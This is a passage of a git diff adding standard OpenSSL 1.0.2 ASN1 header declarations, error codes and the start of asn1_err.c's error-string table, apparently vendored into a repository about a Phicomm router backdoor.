+DECLARE_ASN1_FUNCTIONS(NETSCAPE_X509)
+
+int ASN1_UNIVERSALSTRING_to_string(ASN1_UNIVERSALSTRING *s);
+
+int ASN1_TYPE_set_octetstring(ASN1_TYPE *a, unsigned char *data, int len);
+int ASN1_TYPE_get_octetstring(ASN1_TYPE *a, unsigned char *data, int max_len);
+int ASN1_TYPE_set_int_octetstring(ASN1_TYPE *a, long num,
+                                  unsigned char *data, int len);
+int ASN1_TYPE_get_int_octetstring(ASN1_TYPE *a, long *num,
+                                  unsigned char *data, int max_len);
+
+STACK_OF(OPENSSL_BLOCK) *ASN1_seq_unpack(const unsigned char *buf, int len,
+                                         d2i_of_void *d2i,
+                                         void (*free_func) (OPENSSL_BLOCK));
+unsigned char *ASN1_seq_pack(STACK_OF(OPENSSL_BLOCK) *safes, i2d_of_void *i2d,
+                             unsigned char **buf, int *len);
+void *ASN1_unpack_string(ASN1_STRING *oct, d2i_of_void *d2i);
+void *ASN1_item_unpack(ASN1_STRING *oct, const ASN1_ITEM *it);
+ASN1_STRING *ASN1_pack_string(void *obj, i2d_of_void *i2d,
+                              ASN1_OCTET_STRING **oct);
+
+# define ASN1_pack_string_of(type,obj,i2d,oct) \
+    (ASN1_pack_string(CHECKED_PTR_OF(type, obj), \
+                      CHECKED_I2D_OF(type, i2d), \
+                      oct))
+
+ASN1_STRING *ASN1_item_pack(void *obj, const ASN1_ITEM *it,
+                            ASN1_OCTET_STRING **oct);
+
+void ASN1_STRING_set_default_mask(unsigned long mask);
+int ASN1_STRING_set_default_mask_asc(const char *p);
+unsigned long ASN1_STRING_get_default_mask(void);
+int ASN1_mbstring_copy(ASN1_STRING **out, const unsigned char *in, int len,
+                       int inform, unsigned long mask);
+int ASN1_mbstring_ncopy(ASN1_STRING **out, const unsigned char *in, int len,
+                        int inform, unsigned long mask,
+                        long minsize, long maxsize);
+
+ASN1_STRING *ASN1_STRING_set_by_NID(ASN1_STRING **out,
+                                    const unsigned char *in, int inlen,
+                                    int inform, int nid);
+ASN1_STRING_TABLE *ASN1_STRING_TABLE_get(int nid);
+int ASN1_STRING_TABLE_add(int, long, long, unsigned long, unsigned long);
+void ASN1_STRING_TABLE_cleanup(void);
+
+/* ASN1 template functions */
+
+/* Old API compatible functions */
+ASN1_VALUE *ASN1_item_new(const ASN1_ITEM *it);
+void ASN1_item_free(ASN1_VALUE *val, const ASN1_ITEM *it);
+ASN1_VALUE *ASN1_item_d2i(ASN1_VALUE **val, const unsigned char **in,
+                          long len, const ASN1_ITEM *it);
+int ASN1_item_i2d(ASN1_VALUE *val, unsigned char **out, const ASN1_ITEM *it);
+int ASN1_item_ndef_i2d(ASN1_VALUE *val, unsigned char **out,
+                       const ASN1_ITEM *it);
+
+void ASN1_add_oid_module(void);
+
+ASN1_TYPE *ASN1_generate_nconf(char *str, CONF *nconf);
+ASN1_TYPE *ASN1_generate_v3(char *str, X509V3_CTX *cnf);
+
+/* ASN1 Print flags */
+
+/* Indicate missing OPTIONAL fields */
+# define ASN1_PCTX_FLAGS_SHOW_ABSENT             0x001
+/* Mark start and end of SEQUENCE */
+# define ASN1_PCTX_FLAGS_SHOW_SEQUENCE           0x002
+/* Mark start and end of SEQUENCE/SET OF */
+# define ASN1_PCTX_FLAGS_SHOW_SSOF               0x004
+/* Show the ASN1 type of primitives */
+# define ASN1_PCTX_FLAGS_SHOW_TYPE               0x008
+/* Don't show ASN1 type of ANY */
+# define ASN1_PCTX_FLAGS_NO_ANY_TYPE             0x010
+/* Don't show ASN1 type of MSTRINGs */
+# define ASN1_PCTX_FLAGS_NO_MSTRING_TYPE         0x020
+/* Don't show field names in SEQUENCE */
+# define ASN1_PCTX_FLAGS_NO_FIELD_NAME           0x040
+/* Show structure names of each SEQUENCE field */
+# define ASN1_PCTX_FLAGS_SHOW_FIELD_STRUCT_NAME  0x080
+/* Don't show structure name even at top level */
+# define ASN1_PCTX_FLAGS_NO_STRUCT_NAME          0x100
+
+int ASN1_item_print(BIO *out, ASN1_VALUE *ifld, int indent,
+                    const ASN1_ITEM *it, const ASN1_PCTX *pctx);
+ASN1_PCTX *ASN1_PCTX_new(void);
+void ASN1_PCTX_free(ASN1_PCTX *p);
+unsigned long ASN1_PCTX_get_flags(ASN1_PCTX *p);
+void ASN1_PCTX_set_flags(ASN1_PCTX *p, unsigned long flags);
+unsigned long ASN1_PCTX_get_nm_flags(ASN1_PCTX *p);
+void ASN1_PCTX_set_nm_flags(ASN1_PCTX *p, unsigned long flags);
+unsigned long ASN1_PCTX_get_cert_flags(ASN1_PCTX *p);
+void ASN1_PCTX_set_cert_flags(ASN1_PCTX *p, unsigned long flags);
+unsigned long ASN1_PCTX_get_oid_flags(ASN1_PCTX *p);
+void ASN1_PCTX_set_oid_flags(ASN1_PCTX *p, unsigned long flags);
+unsigned long ASN1_PCTX_get_str_flags(ASN1_PCTX *p);
+void ASN1_PCTX_set_str_flags(ASN1_PCTX *p, unsigned long flags);
+
+BIO_METHOD *BIO_f_asn1(void);
+
+BIO *BIO_new_NDEF(BIO *out, ASN1_VALUE *val, const ASN1_ITEM *it);
+
+int i2d_ASN1_bio_stream(BIO *out, ASN1_VALUE *val, BIO *in, int flags,
+                        const ASN1_ITEM *it);
+int PEM_write_bio_ASN1_stream(BIO *out, ASN1_VALUE *val, BIO *in, int flags,
+                              const char *hdr, const ASN1_ITEM *it);
+int SMIME_write_ASN1(BIO *bio, ASN1_VALUE *val, BIO *data, int flags,
+                     int ctype_nid, int econt_nid,
+                     STACK_OF(X509_ALGOR) *mdalgs, const ASN1_ITEM *it);
+ASN1_VALUE *SMIME_read_ASN1(BIO *bio, BIO **bcont, const ASN1_ITEM *it);
+int SMIME_crlf_copy(BIO *in, BIO *out, int flags);
+int SMIME_text(BIO *in, BIO *out);
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+void ERR_load_ASN1_strings(void);
+
+/* Error codes for the ASN1 functions. */
+
+/* Function codes. */
+# define ASN1_F_A2D_ASN1_OBJECT                           100
+# define ASN1_F_A2I_ASN1_ENUMERATED                       101
+# define ASN1_F_A2I_ASN1_INTEGER                          102
+# define ASN1_F_A2I_ASN1_STRING                           103
+# define ASN1_F_APPEND_EXP                                176
+# define ASN1_F_ASN1_BIT_STRING_SET_BIT                   183
+# define ASN1_F_ASN1_CB                                   177
+# define ASN1_F_ASN1_CHECK_TLEN                           104
+# define ASN1_F_ASN1_COLLATE_PRIMITIVE                    105
+# define ASN1_F_ASN1_COLLECT                              106
+# define ASN1_F_ASN1_D2I_EX_PRIMITIVE                     108
+# define ASN1_F_ASN1_D2I_FP                               109
+# define ASN1_F_ASN1_D2I_READ_BIO                         107
+# define ASN1_F_ASN1_DIGEST                               184
+# define ASN1_F_ASN1_DO_ADB                               110
+# define ASN1_F_ASN1_DUP                                  111
+# define ASN1_F_ASN1_ENUMERATED_SET                       112
+# define ASN1_F_ASN1_ENUMERATED_TO_BN                     113
+# define ASN1_F_ASN1_EX_C2I                               204
+# define ASN1_F_ASN1_FIND_END                             190
+# define ASN1_F_ASN1_GENERALIZEDTIME_ADJ                  216
+# define ASN1_F_ASN1_GENERALIZEDTIME_SET                  185
+# define ASN1_F_ASN1_GENERATE_V3                          178
+# define ASN1_F_ASN1_GET_OBJECT                           114
+# define ASN1_F_ASN1_HEADER_NEW                           115
+# define ASN1_F_ASN1_I2D_BIO                              116
+# define ASN1_F_ASN1_I2D_FP                               117
+# define ASN1_F_ASN1_INTEGER_SET                          118
+# define ASN1_F_ASN1_INTEGER_TO_BN                        119
+# define ASN1_F_ASN1_ITEM_D2I_FP                          206
+# define ASN1_F_ASN1_ITEM_DUP                             191
+# define ASN1_F_ASN1_ITEM_EX_COMBINE_NEW                  121
+# define ASN1_F_ASN1_ITEM_EX_D2I                          120
+# define ASN1_F_ASN1_ITEM_I2D_BIO                         192
+# define ASN1_F_ASN1_ITEM_I2D_FP                          193
+# define ASN1_F_ASN1_ITEM_PACK                            198
+# define ASN1_F_ASN1_ITEM_SIGN                            195
+# define ASN1_F_ASN1_ITEM_SIGN_CTX                        220
+# define ASN1_F_ASN1_ITEM_UNPACK                          199
+# define ASN1_F_ASN1_ITEM_VERIFY                          197
+# define ASN1_F_ASN1_MBSTRING_NCOPY                       122
+# define ASN1_F_ASN1_OBJECT_NEW                           123
+# define ASN1_F_ASN1_OUTPUT_DATA                          214
+# define ASN1_F_ASN1_PACK_STRING                          124
+# define ASN1_F_ASN1_PCTX_NEW                             205
+# define ASN1_F_ASN1_PKCS5_PBE_SET                        125
+# define ASN1_F_ASN1_SEQ_PACK                             126
+# define ASN1_F_ASN1_SEQ_UNPACK                           127
+# define ASN1_F_ASN1_SIGN                                 128
+# define ASN1_F_ASN1_STR2TYPE                             179
+# define ASN1_F_ASN1_STRING_SET                           186
+# define ASN1_F_ASN1_STRING_TABLE_ADD                     129
+# define ASN1_F_ASN1_STRING_TYPE_NEW                      130
+# define ASN1_F_ASN1_TEMPLATE_EX_D2I                      132
+# define ASN1_F_ASN1_TEMPLATE_NEW                         133
+# define ASN1_F_ASN1_TEMPLATE_NOEXP_D2I                   131
+# define ASN1_F_ASN1_TIME_ADJ                             217
+# define ASN1_F_ASN1_TIME_SET                             175
+# define ASN1_F_ASN1_TYPE_GET_INT_OCTETSTRING             134
+# define ASN1_F_ASN1_TYPE_GET_OCTETSTRING                 135
+# define ASN1_F_ASN1_UNPACK_STRING                        136
+# define ASN1_F_ASN1_UTCTIME_ADJ                          218
+# define ASN1_F_ASN1_UTCTIME_SET                          187
+# define ASN1_F_ASN1_VERIFY                               137
+# define ASN1_F_B64_READ_ASN1                             209
+# define ASN1_F_B64_WRITE_ASN1                            210
+# define ASN1_F_BIO_NEW_NDEF                              208
+# define ASN1_F_BITSTR_CB                                 180
+# define ASN1_F_BN_TO_ASN1_ENUMERATED                     138
+# define ASN1_F_BN_TO_ASN1_INTEGER                        139
+# define ASN1_F_C2I_ASN1_BIT_STRING                       189
+# define ASN1_F_C2I_ASN1_INTEGER                          194
+# define ASN1_F_C2I_ASN1_OBJECT                           196
+# define ASN1_F_COLLECT_DATA                              140
+# define ASN1_F_D2I_ASN1_BIT_STRING                       141
+# define ASN1_F_D2I_ASN1_BOOLEAN                          142
+# define ASN1_F_D2I_ASN1_BYTES                            143
+# define ASN1_F_D2I_ASN1_GENERALIZEDTIME                  144
+# define ASN1_F_D2I_ASN1_HEADER                           145
+# define ASN1_F_D2I_ASN1_INTEGER                          146
+# define ASN1_F_D2I_ASN1_OBJECT                           147
+# define ASN1_F_D2I_ASN1_SET                              148
+# define ASN1_F_D2I_ASN1_TYPE_BYTES                       149
+# define ASN1_F_D2I_ASN1_UINTEGER                         150
+# define ASN1_F_D2I_ASN1_UTCTIME                          151
+# define ASN1_F_D2I_AUTOPRIVATEKEY                        207
+# define ASN1_F_D2I_NETSCAPE_RSA                          152
+# define ASN1_F_D2I_NETSCAPE_RSA_2                        153
+# define ASN1_F_D2I_PRIVATEKEY                            154
+# define ASN1_F_D2I_PUBLICKEY                             155
+# define ASN1_F_D2I_RSA_NET                               200
+# define ASN1_F_D2I_RSA_NET_2                             201
+# define ASN1_F_D2I_X509                                  156
+# define ASN1_F_D2I_X509_CINF                             157
+# define ASN1_F_D2I_X509_PKEY                             159
+# define ASN1_F_I2D_ASN1_BIO_STREAM                       211
+# define ASN1_F_I2D_ASN1_SET                              188
+# define ASN1_F_I2D_ASN1_TIME                             160
+# define ASN1_F_I2D_DSA_PUBKEY                            161
+# define ASN1_F_I2D_EC_PUBKEY                             181
+# define ASN1_F_I2D_PRIVATEKEY                            163
+# define ASN1_F_I2D_PUBLICKEY                             164
+# define ASN1_F_I2D_RSA_NET                               162
+# define ASN1_F_I2D_RSA_PUBKEY                            165
+# define ASN1_F_LONG_C2I                                  166
+# define ASN1_F_OID_MODULE_INIT                           174
+# define ASN1_F_PARSE_TAGGING                             182
+# define ASN1_F_PKCS5_PBE2_SET_IV                         167
+# define ASN1_F_PKCS5_PBE_SET                             202
+# define ASN1_F_PKCS5_PBE_SET0_ALGOR                      215
+# define ASN1_F_PKCS5_PBKDF2_SET                          219
+# define ASN1_F_SMIME_READ_ASN1                           212
+# define ASN1_F_SMIME_TEXT                                213
+# define ASN1_F_X509_CINF_NEW                             168
+# define ASN1_F_X509_CRL_ADD0_REVOKED                     169
+# define ASN1_F_X509_INFO_NEW                             170
+# define ASN1_F_X509_NAME_ENCODE                          203
+# define ASN1_F_X509_NAME_EX_D2I                          158
+# define ASN1_F_X509_NAME_EX_NEW                          171
+# define ASN1_F_X509_NEW                                  172
+# define ASN1_F_X509_PKEY_NEW                             173
+
+/* Reason codes. */
+# define ASN1_R_ADDING_OBJECT                             171
+# define ASN1_R_ASN1_PARSE_ERROR                          203
+# define ASN1_R_ASN1_SIG_PARSE_ERROR                      204
+# define ASN1_R_AUX_ERROR                                 100
+# define ASN1_R_BAD_CLASS                                 101
+# define ASN1_R_BAD_OBJECT_HEADER                         102
+# define ASN1_R_BAD_PASSWORD_READ                         103
+# define ASN1_R_BAD_TAG                                   104
+# define ASN1_R_BMPSTRING_IS_WRONG_LENGTH                 214
+# define ASN1_R_BN_LIB                                    105
+# define ASN1_R_BOOLEAN_IS_WRONG_LENGTH                   106
+# define ASN1_R_BUFFER_TOO_SMALL                          107
+# define ASN1_R_CIPHER_HAS_NO_OBJECT_IDENTIFIER           108
+# define ASN1_R_CONTEXT_NOT_INITIALISED                   217
+# define ASN1_R_DATA_IS_WRONG                             109
+# define ASN1_R_DECODE_ERROR                              110
+# define ASN1_R_DECODING_ERROR                            111
+# define ASN1_R_DEPTH_EXCEEDED                            174
+# define ASN1_R_DIGEST_AND_KEY_TYPE_NOT_SUPPORTED         198
+# define ASN1_R_ENCODE_ERROR                              112
+# define ASN1_R_ERROR_GETTING_TIME                        173
+# define ASN1_R_ERROR_LOADING_SECTION                     172
+# define ASN1_R_ERROR_PARSING_SET_ELEMENT                 113
+# define ASN1_R_ERROR_SETTING_CIPHER_PARAMS               114
+# define ASN1_R_EXPECTING_AN_INTEGER                      115
+# define ASN1_R_EXPECTING_AN_OBJECT                       116
+# define ASN1_R_EXPECTING_A_BOOLEAN                       117
+# define ASN1_R_EXPECTING_A_TIME                          118
+# define ASN1_R_EXPLICIT_LENGTH_MISMATCH                  119
+# define ASN1_R_EXPLICIT_TAG_NOT_CONSTRUCTED              120
+# define ASN1_R_FIELD_MISSING                             121
+# define ASN1_R_FIRST_NUM_TOO_LARGE                       122
+# define ASN1_R_HEADER_TOO_LONG                           123
+# define ASN1_R_ILLEGAL_BITSTRING_FORMAT                  175
+# define ASN1_R_ILLEGAL_BOOLEAN                           176
+# define ASN1_R_ILLEGAL_CHARACTERS                        124
+# define ASN1_R_ILLEGAL_FORMAT                            177
+# define ASN1_R_ILLEGAL_HEX                               178
+# define ASN1_R_ILLEGAL_IMPLICIT_TAG                      179
+# define ASN1_R_ILLEGAL_INTEGER                           180
+# define ASN1_R_ILLEGAL_NESTED_TAGGING                    181
+# define ASN1_R_ILLEGAL_NULL                              125
+# define ASN1_R_ILLEGAL_NULL_VALUE                        182
+# define ASN1_R_ILLEGAL_OBJECT                            183
+# define ASN1_R_ILLEGAL_OPTIONAL_ANY                      126
+# define ASN1_R_ILLEGAL_OPTIONS_ON_ITEM_TEMPLATE          170
+# define ASN1_R_ILLEGAL_TAGGED_ANY                        127
+# define ASN1_R_ILLEGAL_TIME_VALUE                        184
+# define ASN1_R_INTEGER_NOT_ASCII_FORMAT                  185
+# define ASN1_R_INTEGER_TOO_LARGE_FOR_LONG                128
+# define ASN1_R_INVALID_BIT_STRING_BITS_LEFT              220
+# define ASN1_R_INVALID_BMPSTRING_LENGTH                  129
+# define ASN1_R_INVALID_DIGIT                             130
+# define ASN1_R_INVALID_MIME_TYPE                         205
+# define ASN1_R_INVALID_MODIFIER                          186
+# define ASN1_R_INVALID_NUMBER                            187
+# define ASN1_R_INVALID_OBJECT_ENCODING                   216
+# define ASN1_R_INVALID_SEPARATOR                         131
+# define ASN1_R_INVALID_TIME_FORMAT                       132
+# define ASN1_R_INVALID_UNIVERSALSTRING_LENGTH            133
+# define ASN1_R_INVALID_UTF8STRING                        134
+# define ASN1_R_IV_TOO_LARGE                              135
+# define ASN1_R_LENGTH_ERROR                              136
+# define ASN1_R_LIST_ERROR                                188
+# define ASN1_R_MIME_NO_CONTENT_TYPE                      206
+# define ASN1_R_MIME_PARSE_ERROR                          207
+# define ASN1_R_MIME_SIG_PARSE_ERROR                      208
+# define ASN1_R_MISSING_EOC                               137
+# define ASN1_R_MISSING_SECOND_NUMBER                     138
+# define ASN1_R_MISSING_VALUE                             189
+# define ASN1_R_MSTRING_NOT_UNIVERSAL                     139
+# define ASN1_R_MSTRING_WRONG_TAG                         140
+# define ASN1_R_NESTED_ASN1_STRING                        197
+# define ASN1_R_NON_HEX_CHARACTERS                        141
+# define ASN1_R_NOT_ASCII_FORMAT                          190
+# define ASN1_R_NOT_ENOUGH_DATA                           142
+# define ASN1_R_NO_CONTENT_TYPE                           209
+# define ASN1_R_NO_DEFAULT_DIGEST                         201
+# define ASN1_R_NO_MATCHING_CHOICE_TYPE                   143
+# define ASN1_R_NO_MULTIPART_BODY_FAILURE                 210
+# define ASN1_R_NO_MULTIPART_BOUNDARY                     211
+# define ASN1_R_NO_SIG_CONTENT_TYPE                       212
+# define ASN1_R_NULL_IS_WRONG_LENGTH                      144
+# define ASN1_R_OBJECT_NOT_ASCII_FORMAT                   191
+# define ASN1_R_ODD_NUMBER_OF_CHARS                       145
+# define ASN1_R_PRIVATE_KEY_HEADER_MISSING                146
+# define ASN1_R_SECOND_NUMBER_TOO_LARGE                   147
+# define ASN1_R_SEQUENCE_LENGTH_MISMATCH                  148
+# define ASN1_R_SEQUENCE_NOT_CONSTRUCTED                  149
+# define ASN1_R_SEQUENCE_OR_SET_NEEDS_CONFIG              192
+# define ASN1_R_SHORT_LINE                                150
+# define ASN1_R_SIG_INVALID_MIME_TYPE                     213
+# define ASN1_R_STREAMING_NOT_SUPPORTED                   202
+# define ASN1_R_STRING_TOO_LONG                           151
+# define ASN1_R_STRING_TOO_SHORT                          152
+# define ASN1_R_TAG_VALUE_TOO_HIGH                        153
+# define ASN1_R_THE_ASN1_OBJECT_IDENTIFIER_IS_NOT_KNOWN_FOR_THIS_MD 154
+# define ASN1_R_TIME_NOT_ASCII_FORMAT                     193
+# define ASN1_R_TOO_LONG                                  155
+# define ASN1_R_TYPE_NOT_CONSTRUCTED                      156
+# define ASN1_R_TYPE_NOT_PRIMITIVE                        218
+# define ASN1_R_UNABLE_TO_DECODE_RSA_KEY                  157
+# define ASN1_R_UNABLE_TO_DECODE_RSA_PRIVATE_KEY          158
+# define ASN1_R_UNEXPECTED_EOC                            159
+# define ASN1_R_UNIVERSALSTRING_IS_WRONG_LENGTH           215
+# define ASN1_R_UNKNOWN_FORMAT                            160
+# define ASN1_R_UNKNOWN_MESSAGE_DIGEST_ALGORITHM          161
+# define ASN1_R_UNKNOWN_OBJECT_TYPE                       162
+# define ASN1_R_UNKNOWN_PUBLIC_KEY_TYPE                   163
+# define ASN1_R_UNKNOWN_SIGNATURE_ALGORITHM               199
+# define ASN1_R_UNKNOWN_TAG                               194
+# define ASN1_R_UNKOWN_FORMAT                             195
+# define ASN1_R_UNSUPPORTED_ANY_DEFINED_BY_TYPE           164
+# define ASN1_R_UNSUPPORTED_CIPHER                        165
+# define ASN1_R_UNSUPPORTED_ENCRYPTION_ALGORITHM          166
+# define ASN1_R_UNSUPPORTED_PUBLIC_KEY_TYPE               167
+# define ASN1_R_UNSUPPORTED_TYPE                          196
+# define ASN1_R_WRONG_PUBLIC_KEY_TYPE                     200
+# define ASN1_R_WRONG_TAG                                 168
+# define ASN1_R_WRONG_TYPE                                169
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1_err.c
new file mode 100644
index 0000000..fd4ac8d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1_err.c
@@ -0,0 +1,354 @@
+/* crypto/asn1/asn1_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2014 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include <openssl/asn1.h>
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(ERR_LIB_ASN1,func,0)
+# define ERR_REASON(reason) ERR_PACK(ERR_LIB_ASN1,0,reason)
+
+static ERR_STRING_DATA ASN1_str_functs[] = {
+    {ERR_FUNC(ASN1_F_A2D_ASN1_OBJECT), "a2d_ASN1_OBJECT"},
+    {ERR_FUNC(ASN1_F_A2I_ASN1_ENUMERATED), "a2i_ASN1_ENUMERATED"},
+    {ERR_FUNC(ASN1_F_A2I_ASN1_INTEGER), "a2i_ASN1_INTEGER"},
+    {ERR_FUNC(ASN1_F_A2I_ASN1_STRING), "a2i_ASN1_STRING"},
+    {ERR_FUNC(ASN1_F_APPEND_EXP), "APPEND_EXP"},
+    {ERR_FUNC(ASN1_F_ASN1_BIT_STRING_SET_BIT), "ASN1_BIT_STRING_set_bit"},
+    {ERR_FUNC(ASN1_F_ASN1_CB), "ASN1_CB"},
+    {ERR_FUNC(ASN1_F_ASN1_CHECK_TLEN), "ASN1_CHECK_TLEN"},
+    {ERR_FUNC(ASN1_F_ASN1_COLLATE_PRIMITIVE), "ASN1_COLLATE_PRIMITIVE"},
+    {ERR_FUNC(ASN1_F_ASN1_COLLECT), "ASN1_COLLECT"},
+    {ERR_FUNC(ASN1_F_ASN1_D2I_EX_PRIMITIVE), "ASN1_D2I_EX_PRIMITIVE"},
+    {ERR_FUNC(ASN1_F_ASN1_D2I_FP), "ASN1_d2i_fp"},
+    {ERR_FUNC(ASN1_F_ASN1_D2I_READ_BIO), "ASN1_D2I_READ_BIO"},
+    {ERR_FUNC(ASN1_F_ASN1_DIGEST), "ASN1_digest"},
+    {ERR_FUNC(ASN1_F_ASN1_DO_ADB), "ASN1_DO_ADB"},
+    {ERR_FUNC(ASN1_F_ASN1_DUP), "ASN1_dup"},
+    {ERR_FUNC(ASN1_F_ASN1_ENUMERATED_SET), "ASN1_ENUMERATED_set"},
+    {ERR_FUNC(ASN1_F_ASN1_ENUMERATED_TO_BN), "ASN1_ENUMERATED_to_BN"},
+    {ERR_FUNC(ASN1_F_ASN1_EX_C2I), "ASN1_EX_C2I"},
+    {ERR_FUNC(ASN1_F_ASN1_FIND_END), "ASN1_FIND_END"},
+    {ERR_FUNC(ASN1_F_ASN1_GENERALIZEDTIME_ADJ), "ASN1_GENERALIZEDTIME_adj"},
+    {ERR_FUNC(ASN1_F_ASN1_GENERALIZEDTIME_SET), "ASN1_GENERALIZEDTIME_set"},
+    {ERR_FUNC(ASN1_F_ASN1_GENERATE_V3), "ASN1_generate_v3"},
+    {ERR_FUNC(ASN1_F_ASN1_GET_OBJECT), "ASN1_get_object"},
+    {ERR_FUNC(ASN1_F_ASN1_HEADER_NEW), "ASN1_HEADER_NEW"},
+    {ERR_FUNC(ASN1_F_ASN1_I2D_BIO), "ASN1_i2d_bio"},
+    {ERR_FUNC(ASN1_F_ASN1_I2D_FP), "ASN1_i2d_fp"},
+    {ERR_FUNC(ASN1_F_ASN1_INTEGER_SET), "ASN1_INTEGER_set"},
+    {ERR_FUNC(ASN1_F_ASN1_INTEGER_TO_BN), "ASN1_INTEGER_to_BN"},
+    {ERR_FUNC(ASN1_F_ASN1_ITEM_D2I_FP), "ASN1_item_d2i_fp"},
+    {ERR_FUNC(ASN1_F_ASN1_ITEM_DUP), "ASN1_item_dup"},
+    {ERR_FUNC(ASN1_F_ASN1_ITEM_EX_COMBINE_NEW), "ASN1_ITEM_EX_COMBINE_NEW"},
+    {ERR_FUNC(ASN1_F_ASN1_ITEM_EX_D2I), "ASN1_ITEM_EX_D2I"},
+    {ERR_FUNC(ASN1_F_ASN1_ITEM_I2D_BIO), "ASN1_item_i2d_bio"},
+    {ERR_FUNC(ASN1_F_ASN1_ITEM_I2D_FP), "ASN1_item_i2d_fp"},
+    {ERR_FUNC(ASN1_F_ASN1_ITEM_PACK), "ASN1_item_pack"},
+    {ERR_FUNC(ASN1_F_ASN1_ITEM_SIGN), "ASN1_item_sign"},
+    {ERR_FUNC(ASN1_F_ASN1_ITEM_SIGN_CTX), "ASN1_item_sign_ctx"},
+    {ERR_FUNC(ASN1_F_ASN1_ITEM_UNPACK), "ASN1_item_unpack"},
+    {ERR_FUNC(ASN1_F_ASN1_ITEM_VERIFY), "ASN1_item_verify"},
+    {ERR_FUNC(ASN1_F_ASN1_MBSTRING_NCOPY), "ASN1_mbstring_ncopy"},
+    {ERR_FUNC(ASN1_F_ASN1_OBJECT_NEW), "ASN1_OBJECT_new"},
+    {ERR_FUNC(ASN1_F_ASN1_OUTPUT_DATA), "ASN1_OUTPUT_DATA"},
+    {ERR_FUNC(ASN1_F_ASN1_PACK_STRING), "ASN1_pack_string"},
+    {ERR_FUNC(ASN1_F_ASN1_PCTX_NEW), "ASN1_PCTX_new"},
+    {ERR_FUNC(ASN1_F_ASN1_PKCS5_PBE_SET), "ASN1_PKCS5_PBE_SET"},
+    {ERR_FUNC(ASN1_F_ASN1_SEQ_PACK), "ASN1_seq_pack"},
+    {ERR_FUNC(ASN1_F_ASN1_SEQ_UNPACK), "ASN1_seq_unpack"},
+    {ERR_FUNC(ASN1_F_ASN1_SIGN), "ASN1_sign"},
+    {ERR_FUNC(ASN1_F_ASN1_STR2TYPE), "ASN1_STR2TYPE"},
+    {ERR_FUNC(ASN1_F_ASN1_STRING_SET), "ASN1_STRING_set"},
+    {ERR_FUNC(ASN1_F_ASN1_STRING_TABLE_ADD), "ASN1_STRING_TABLE_add"},
+    {ERR_FUNC(ASN1_F_ASN1_STRING_TYPE_NEW), "ASN1_STRING_type_new"},
+    {ERR_FUNC(ASN1_F_ASN1_TEMPLATE_EX_D2I), "ASN1_TEMPLATE_EX_D2I"},
+    {ERR_FUNC(ASN1_F_ASN1_TEMPLATE_NEW), "ASN1_TEMPLATE_NEW"},
+    {ERR_FUNC(ASN1_F_ASN1_TEMPLATE_NOEXP_D2I), "ASN1_TEMPLATE_NOEXP_D2I"},
+    {ERR_FUNC(ASN1_F_ASN1_TIME_ADJ), "ASN1_TIME_adj"},
+    {ERR_FUNC(ASN1_F_ASN1_TIME_SET), "ASN1_TIME_set"},
+    {ERR_FUNC(ASN1_F_ASN1_TYPE_GET_INT_OCTETSTRING),
+     "ASN1_TYPE_get_int_octetstring"},
+    {ERR_FUNC(ASN1_F_ASN1_TYPE_GET_OCTETSTRING), "ASN1_TYPE_get_octetstring"},
+    {ERR_FUNC(ASN1_F_ASN1_UNPACK_STRING), "ASN1_unpack_string"},
